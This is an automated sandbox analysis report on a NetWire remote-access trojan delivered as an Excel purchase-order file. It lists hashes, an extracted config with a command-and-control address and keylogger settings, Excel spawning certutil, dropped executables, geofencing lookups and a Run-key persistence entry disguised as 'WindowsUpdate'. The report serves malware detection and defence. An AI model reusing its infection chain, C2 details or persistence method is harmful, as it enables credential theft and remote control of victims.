netwire | 13c9bc1d2ac60ca5abb5a235d7d27d8c6f06e497da360f391785044d413cc29e

Analysis

max time kernel
150s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
26-09-2022 08:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO 0767532.xls
Size

107KB
MD5

4d3137651038dfe44ccf6440f6281dfb
SHA1

2d28e875fca6e4f945b5165b03f9aa7747764836
SHA256

13c9bc1d2ac60ca5abb5a235d7d27d8c6f06e497da360f391785044d413cc29e
SHA512

7cfda63f4a2a8a4fd4457135c345f403bb3665e4815c4bb983fa14d05ce94d1cd35daa54926fea9f64a6b998b428ab3cf0f2f05a371941cc145a5fb74e54d0ad
SSDEEP

3072:z9xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAB9pWkmanzr0O8yFKdshErls4:JxEtjPOtioVjDGUU1qfDlavx+W2QnABU

Score

10^/10

netwire botnet persistence rat stealer

Malware Config

Extracted

Family

netwire

37.0.14.206:3384

Attributes

activex_autorun
false
copy_executable
true
delete_original
false
host_id
HostId-%Rand%
install_path
%AppData%\Install\Host.exe
keylogger_dir
%AppData%\Logs\
lock_executable
true
offline_keylogger
true
password
Password234
registry_autorun
false
use_mutex
false

Signatures

NetWire RAT payload 64 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4604-149-0x0000000000D50000-0x00000000013AF000-memory.dmp	netwire
behavioral2/memory/4604-150-0x0000000000D5242D-mapping.dmp	netwire
behavioral2/memory/4604-153-0x0000000000D50000-0x00000000013AF000-memory.dmp	netwire
behavioral2/memory/4604-155-0x0000000000D50000-0x00000000013AF000-memory.dmp	netwire
behavioral2/memory/604-165-0x0000000000F00000-0x000000000155F000-memory.dmp	netwire
behavioral2/memory/604-166-0x0000000000F0242D-mapping.dmp	netwire
behavioral2/memory/604-169-0x0000000000F00000-0x000000000155F000-memory.dmp	netwire
behavioral2/memory/604-173-0x0000000000F00000-0x000000000155F000-memory.dmp	netwire
behavioral2/memory/1516-180-0x000000000050242D-mapping.dmp	netwire
behavioral2/memory/1516-179-0x0000000000500000-0x0000000000A4E000-memory.dmp	netwire
behavioral2/memory/1516-183-0x0000000000500000-0x0000000000A4E000-memory.dmp	netwire
behavioral2/memory/1516-187-0x0000000000500000-0x0000000000A4E000-memory.dmp	netwire
behavioral2/memory/2392-192-0x0000000000900000-0x0000000000FC6000-memory.dmp	netwire
behavioral2/memory/2392-193-0x000000000090242D-mapping.dmp	netwire
behavioral2/memory/2392-196-0x0000000000900000-0x0000000000FC6000-memory.dmp	netwire
behavioral2/memory/2392-200-0x0000000000900000-0x0000000000FC6000-memory.dmp	netwire
behavioral2/memory/4268-205-0x0000000000C00000-0x000000000117D000-memory.dmp	netwire
behavioral2/memory/4268-206-0x0000000000C0242D-mapping.dmp	netwire
behavioral2/memory/4268-209-0x0000000000C00000-0x000000000117D000-memory.dmp	netwire
behavioral2/memory/4268-213-0x0000000000C00000-0x000000000117D000-memory.dmp	netwire
behavioral2/memory/1060-222-0x00000000007A0000-0x0000000000DD6000-memory.dmp	netwire
behavioral2/memory/1060-219-0x00000000007A242D-mapping.dmp	netwire
behavioral2/memory/1060-218-0x00000000007A0000-0x0000000000DD6000-memory.dmp	netwire
behavioral2/memory/1060-224-0x00000000007A0000-0x0000000000DD6000-memory.dmp	netwire
behavioral2/memory/3944-231-0x0000000001100000-0x000000000165A000-memory.dmp	netwire
behavioral2/memory/3944-232-0x000000000110242D-mapping.dmp	netwire
behavioral2/memory/3944-235-0x0000000001100000-0x000000000165A000-memory.dmp	netwire
behavioral2/memory/3944-237-0x0000000001100000-0x000000000165A000-memory.dmp	netwire
behavioral2/memory/3440-244-0x0000000001320000-0x0000000001A0C000-memory.dmp	netwire
behavioral2/memory/3440-245-0x000000000132242D-mapping.dmp	netwire
behavioral2/memory/3440-248-0x0000000001320000-0x0000000001A0C000-memory.dmp	netwire
behavioral2/memory/3440-252-0x0000000001320000-0x0000000001A0C000-memory.dmp	netwire
behavioral2/memory/1008-257-0x0000000000900000-0x0000000000E8E000-memory.dmp	netwire
behavioral2/memory/1008-258-0x000000000090242D-mapping.dmp	netwire
behavioral2/memory/1008-261-0x0000000000900000-0x0000000000E8E000-memory.dmp	netwire
behavioral2/memory/1008-263-0x0000000000900000-0x0000000000E8E000-memory.dmp	netwire
behavioral2/memory/2936-270-0x0000000000B00000-0x0000000001096000-memory.dmp	netwire
behavioral2/memory/2936-271-0x0000000000B0242D-mapping.dmp	netwire
behavioral2/memory/2936-274-0x0000000000B00000-0x0000000001096000-memory.dmp	netwire
behavioral2/memory/2936-276-0x0000000000B00000-0x0000000001096000-memory.dmp	netwire
behavioral2/memory/1604-283-0x0000000000700000-0x0000000000E53000-memory.dmp	netwire
behavioral2/memory/1604-284-0x000000000070242D-mapping.dmp	netwire
behavioral2/memory/1604-287-0x0000000000700000-0x0000000000E53000-memory.dmp	netwire
behavioral2/memory/1604-291-0x0000000000700000-0x0000000000E53000-memory.dmp	netwire
behavioral2/memory/4292-297-0x0000000000B0242D-mapping.dmp	netwire
behavioral2/memory/4292-296-0x0000000000B00000-0x0000000000FCF000-memory.dmp	netwire
behavioral2/memory/4292-299-0x0000000000B00000-0x0000000000FCF000-memory.dmp	netwire
behavioral2/memory/4292-301-0x0000000000B00000-0x0000000000FCF000-memory.dmp	netwire
behavioral2/memory/2896-304-0x0000000001200000-0x00000000016F8000-memory.dmp	netwire
behavioral2/memory/2896-305-0x000000000120242D-mapping.dmp	netwire
behavioral2/memory/2896-307-0x0000000001200000-0x00000000016F8000-memory.dmp	netwire
behavioral2/memory/2896-309-0x0000000001200000-0x00000000016F8000-memory.dmp	netwire
behavioral2/memory/2440-313-0x000000000070242D-mapping.dmp	netwire
behavioral2/memory/2440-312-0x0000000000700000-0x0000000000D60000-memory.dmp	netwire
behavioral2/memory/2440-315-0x0000000000700000-0x0000000000D60000-memory.dmp	netwire
behavioral2/memory/2440-316-0x0000000000700000-0x0000000000D60000-memory.dmp	netwire
behavioral2/memory/228-320-0x0000000000500000-0x0000000000A4B000-memory.dmp	netwire
behavioral2/memory/228-321-0x000000000050242D-mapping.dmp	netwire
behavioral2/memory/228-323-0x0000000000500000-0x0000000000A4B000-memory.dmp	netwire
behavioral2/memory/228-324-0x0000000000500000-0x0000000000A4B000-memory.dmp	netwire
behavioral2/memory/4672-329-0x0000000000D4242D-mapping.dmp	netwire
behavioral2/memory/4672-328-0x0000000000D40000-0x00000000013EC000-memory.dmp	netwire
behavioral2/memory/4672-331-0x0000000000D40000-0x00000000013EC000-memory.dmp	netwire
behavioral2/memory/4672-332-0x0000000000D40000-0x00000000013EC000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

certutil.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4552	4856	certutil.exe	EXCEL.EXE

Downloads MZ/PE file

Executes dropped EXE 64 IoCs

Processes:

WinUpdate.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exexckjkc.pifRegSvcs.exeHost.exe

pid	process
3756	WinUpdate.exe
3516	xckjkc.pif
4604	RegSvcs.exe
2708	Host.exe
3420	xckjkc.pif
604	RegSvcs.exe
3952	Host.exe
4168	xckjkc.pif
1516	RegSvcs.exe
3540	Host.exe
3068	xckjkc.pif
2392	RegSvcs.exe
3416	Host.exe
2196	xckjkc.pif
4268	RegSvcs.exe
2368	Host.exe
4252	xckjkc.pif
1060	RegSvcs.exe
1664	Host.exe
532	xckjkc.pif
3944	RegSvcs.exe
3852	Host.exe
3616	xckjkc.pif
3440	RegSvcs.exe
1328	Host.exe
4672	xckjkc.pif
1008	RegSvcs.exe
700	Host.exe
4272	xckjkc.pif
2936	RegSvcs.exe
4228	Host.exe
4188	xckjkc.pif
1604	RegSvcs.exe
3832	Host.exe
1508	xckjkc.pif
4292	RegSvcs.exe
460	Host.exe
1828	xckjkc.pif
2896	RegSvcs.exe
3944	Host.exe
2176	xckjkc.pif
2440	RegSvcs.exe
4736	Host.exe
3092	xckjkc.pif
228	RegSvcs.exe
240	Host.exe
908	xckjkc.pif
4672	RegSvcs.exe
1864	Host.exe
4496	xckjkc.pif
4604	RegSvcs.exe
3736	Host.exe
3560	xckjkc.pif
2960	RegSvcs.exe
668	Host.exe
2248	xckjkc.pif
4648	RegSvcs.exe
2512	Host.exe
2840	xckjkc.pif
2052	RegSvcs.exe
396	Host.exe
4296	xckjkc.pif
1148	RegSvcs.exe
3564	Host.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegSvcs.exexckjkc.pifxckjkc.pifWScript.exeWinUpdate.exexckjkc.pifWScript.exeWScript.exexckjkc.pifWScript.exexckjkc.pifRegSvcs.exeRegSvcs.exeWScript.exexckjkc.pifxckjkc.pifWScript.exexckjkc.pifRegSvcs.exeWScript.exeRegSvcs.exexckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifWScript.exeWScript.exeWScript.exexckjkc.pifRegSvcs.exeRegSvcs.exeWScript.exeRegSvcs.exeRegSvcs.exexckjkc.pifxckjkc.pifRegSvcs.exeRegSvcs.exeWScript.exexckjkc.pifWScript.exeRegSvcs.exexckjkc.pifRegSvcs.exexckjkc.pifWScript.exexckjkc.pifRegSvcs.exeWScript.exeRegSvcs.exeRegSvcs.exeWScript.exexckjkc.pifWScript.exexckjkc.pifWScript.exeWScript.exexckjkc.pifRegSvcs.exeRegSvcs.exeRegSvcs.exeRegSvcs.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WinUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	xckjkc.pif
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegSvcs.exe

Adds Run key to start application 2 TTPs 54 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

xckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pif

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
